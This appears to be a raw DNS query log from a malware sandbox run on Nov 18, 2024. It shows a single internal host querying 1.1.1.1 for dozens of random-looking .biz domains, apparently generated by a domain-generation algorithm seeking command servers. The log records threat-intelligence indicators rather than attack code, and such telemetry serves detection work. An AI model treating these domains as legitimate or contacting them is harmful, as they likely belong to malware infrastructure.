                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.420738935 CET192.168.2.101.1.1.10x5416Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.259460926 CET192.168.2.101.1.1.10x89cStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.631128073 CET192.168.2.101.1.1.10x631aStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.714334011 CET192.168.2.101.1.1.10xe17dStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.204775095 CET192.168.2.101.1.1.10x7dafStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.415169001 CET192.168.2.101.1.1.10x6818Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.301273108 CET192.168.2.101.1.1.10x2f6Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.409352064 CET192.168.2.101.1.1.10xbca7Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.831660032 CET192.168.2.101.1.1.10x99deStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.853405952 CET192.168.2.101.1.1.10x747dStandard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.802175045 CET192.168.2.101.1.1.10x1b5cStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.336687088 CET192.168.2.101.1.1.10xa700Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.732163906 CET192.168.2.101.1.1.10xb498Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.190749884 CET192.168.2.101.1.1.10x31daStandard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.230139971 CET192.168.2.101.1.1.10xb521Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.240436077 CET192.168.2.101.1.1.10xaaf0Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.317244053 CET192.168.2.101.1.1.10xd4c1Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.081412077 CET192.168.2.101.1.1.10x31a1Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.175071955 CET192.168.2.101.1.1.10x6211Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.638642073 CET192.168.2.101.1.1.10x4306Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.022074938 CET192.168.2.101.1.1.10x88ebStandard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.086400986 CET192.168.2.101.1.1.10x784dStandard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.104240894 CET192.168.2.101.1.1.10x8f06Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.956147909 CET192.168.2.101.1.1.10x5d76Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:27.575366020 CET192.168.2.101.1.1.10x699dStandard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:28.451461077 CET192.168.2.101.1.1.10x235eStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.227797031 CET192.168.2.101.1.1.10x3312Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:29.966519117 CET192.168.2.101.1.1.10x6450Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.449820995 CET192.168.2.101.1.1.10x4a54Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.830199957 CET192.168.2.101.1.1.10x3b3cStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.544085979 CET192.168.2.101.1.1.10x3154Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.583751917 CET192.168.2.101.1.1.10xc163Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.444132090 CET192.168.2.101.1.1.10x3093Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.778419971 CET192.168.2.101.1.1.10xf479Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.447536945 CET192.168.2.101.1.1.10x6d0cStandard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.781512976 CET192.168.2.101.1.1.10x5de5Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.600795984 CET192.168.2.101.1.1.10xaf3bStandard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.967974901 CET192.168.2.101.1.1.10x5599Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.002373934 CET192.168.2.101.1.1.10xb250Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.090488911 CET192.168.2.101.1.1.10x43ddStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.960238934 CET192.168.2.101.1.1.10x4adcStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.057459116 CET192.168.2.101.1.1.10x77bStandard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.182837009 CET192.168.2.101.1.1.10xb4f3Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.477814913 CET192.168.2.101.1.1.10xdc65Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.119267941 CET192.168.2.101.1.1.10x5934Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.170864105 CET192.168.2.101.1.1.10x785aStandard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.179410934 CET192.168.2.101.1.1.10x84beStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.077641010 CET192.168.2.101.1.1.10xed74Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.087145090 CET192.168.2.101.1.1.10x897Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.637636900 CET192.168.2.101.1.1.10x8b1Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.626871109 CET192.168.2.101.1.1.10xb1caStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.849276066 CET192.168.2.101.1.1.10xe9efStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.788063049 CET192.168.2.101.1.1.10xaacaStandard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.111144066 CET192.168.2.101.1.1.10xedcaStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.571695089 CET192.168.2.101.1.1.10xa8daStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.359303951 CET192.168.2.101.1.1.10x5389Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.403120995 CET192.168.2.101.1.1.10xfeeaStandard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.217324972 CET192.168.2.101.1.1.10xb5d7Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.275027037 CET192.168.2.101.1.1.10xc50fStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.962408066 CET192.168.2.101.1.1.10x9872Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.701958895 CET192.168.2.101.1.1.10xeaecStandard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.827322960 CET192.168.2.101.1.1.10xd354Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.581064939 CET192.168.2.101.1.1.10xe3d6Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.807296038 CET192.168.2.101.1.1.10x2a6eStandard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.300575018 CET192.168.2.101.1.1.10xe7d8Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.447861910 CET192.168.2.101.1.1.10x262cStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.448919058 CET192.168.2.101.1.1.10xe81dStandard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.333614111 CET192.168.2.101.1.1.10x709fStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.471158028 CET192.168.2.101.1.1.10x937aStandard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:52.433979988 CET192.168.2.101.1.1.10x43b5Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:52.967678070 CET192.168.2.101.1.1.10x5107Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.308912992 CET192.168.2.101.1.1.10x1a3fStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.648130894 CET192.168.2.101.1.1.10x7ea7Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.497812033 CET192.168.2.101.1.1.10xce10Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.814460039 CET192.168.2.101.1.1.10xa823Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.992954969 CET192.168.2.101.1.1.10xbfecStandard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.326087952 CET192.168.2.101.1.1.10x6af5Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.008620977 CET192.168.2.101.1.1.10xabe9Standard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.009326935 CET192.168.2.101.1.1.10x1c79Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.054044008 CET192.168.2.101.1.1.10xc11aStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.214929104 CET192.168.2.101.1.1.10x7ec7Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.736587048 CET192.168.2.101.1.1.10xccc0Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.962940931 CET192.168.2.101.1.1.10xf21dStandard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.033211946 CET192.168.2.101.1.1.10xf0e0Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.150006056 CET192.168.2.101.1.1.10x75efStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.997330904 CET192.168.2.101.1.1.10xfd85Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.748310089 CET192.168.2.101.1.1.10x8066Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.883331060 CET192.168.2.101.1.1.10x4e16Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.048557997 CET192.168.2.101.1.1.10x9710Standard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.049061060 CET192.168.2.101.1.1.10x718fStandard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.752738953 CET192.168.2.101.1.1.10x95f5Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.462918043 CET192.168.2.101.1.1.10xc9afStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.471190929 CET192.168.2.101.1.1.10x8507Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.576869011 CET192.168.2.101.1.1.10xe7dStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.472784042 CET192.168.2.101.1.1.10x5134Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.973336935 CET192.168.2.101.1.1.10xa2afStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.668617010 CET192.168.2.101.1.1.10xa4b1Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.983923912 CET192.168.2.101.1.1.10xee23Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.131947994 CET192.168.2.101.1.1.10xfc39Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.841229916 CET192.168.2.101.1.1.10x37ceStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.981628895 CET192.168.2.101.1.1.10xd203Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.664828062 CET192.168.2.101.1.1.10x71daStandard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.197140932 CET192.168.2.101.1.1.10x291Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.354950905 CET192.168.2.101.1.1.10x934dStandard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.129174948 CET192.168.2.101.1.1.10xd3ceStandard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.842660904 CET192.168.2.101.1.1.10xd255Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.705854893 CET192.168.2.101.1.1.10x523fStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.926997900 CET192.168.2.101.1.1.10x9634Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.574270010 CET192.168.2.101.1.1.10x7937Standard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.630305052 CET192.168.2.101.1.1.10xdcb6Standard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.652856112 CET192.168.2.101.1.1.10xdcb6Standard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.570668936 CET192.168.2.101.1.1.10x1f1cStandard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.915302038 CET192.168.2.101.1.1.10x67c2Standard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.433301926 CET192.168.2.101.1.1.10xb5eStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.908118010 CET192.168.2.101.1.1.10x1095Standard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.942652941 CET192.168.2.101.1.1.10xebeStandard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.763411045 CET192.168.2.101.1.1.10xa866Standard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.388464928 CET192.168.2.101.1.1.10x939cStandard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.102118969 CET192.168.2.101.1.1.10xc2e1Standard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.250298023 CET192.168.2.101.1.1.10xbe3fStandard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.795097113 CET192.168.2.101.1.1.10x5011Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.299884081 CET192.168.2.101.1.1.10x2cb7Standard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.481055975 CET192.168.2.101.1.1.10xe8acStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.205691099 CET192.168.2.101.1.1.10x1d51Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.897087097 CET192.168.2.101.1.1.10xd7d1Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.993688107 CET192.168.2.101.1.1.10xef0bStandard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.350317955 CET192.168.2.101.1.1.10xd039Standard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.352649927 CET192.168.2.101.1.1.10xf31aStandard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.384247065 CET192.168.2.101.1.1.10xf31aStandard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.384874105 CET192.168.2.101.1.1.10xb014Standard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.233866930 CET192.168.2.101.1.1.10x28faStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.251584053 CET192.168.2.101.1.1.10xc519Standard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.944452047 CET192.168.2.101.1.1.10x73f6Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.099728107 CET192.168.2.101.1.1.10xf345Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.497190952 CET192.168.2.101.1.1.10xb59Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.645207882 CET192.168.2.101.1.1.10x7f1dStandard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.612361908 CET192.168.2.101.1.1.10x3167Standard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.221752882 CET192.168.2.101.1.1.10x4ebaStandard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.471430063 CET192.168.2.101.1.1.10x5ae0Standard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.902534962 CET192.168.2.101.1.1.10x16d1Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.317163944 CET192.168.2.101.1.1.10x4a83Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.608676910 CET192.168.2.101.1.1.10x941Standard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.813735008 CET192.168.2.101.1.1.10x568Standard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.087646008 CET192.168.2.101.1.1.10xaad7Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.778492928 CET192.168.2.101.1.1.10xf15Standard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.313081026 CET192.168.2.101.1.1.10xf439Standard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.478019953 CET192.168.2.101.1.1.10x5c88Standard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.009798050 CET192.168.2.101.1.1.10x8ff2Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.719105005 CET192.168.2.101.1.1.10x56abStandard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.946558952 CET192.168.2.101.1.1.10x8139Standard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.576913118 CET192.168.2.101.1.1.10x2ef2Standard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.800734043 CET192.168.2.101.1.1.10x7bffStandard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.262712955 CET192.168.2.101.1.1.10x7164Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.293477058 CET192.168.2.101.1.1.10x7164Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
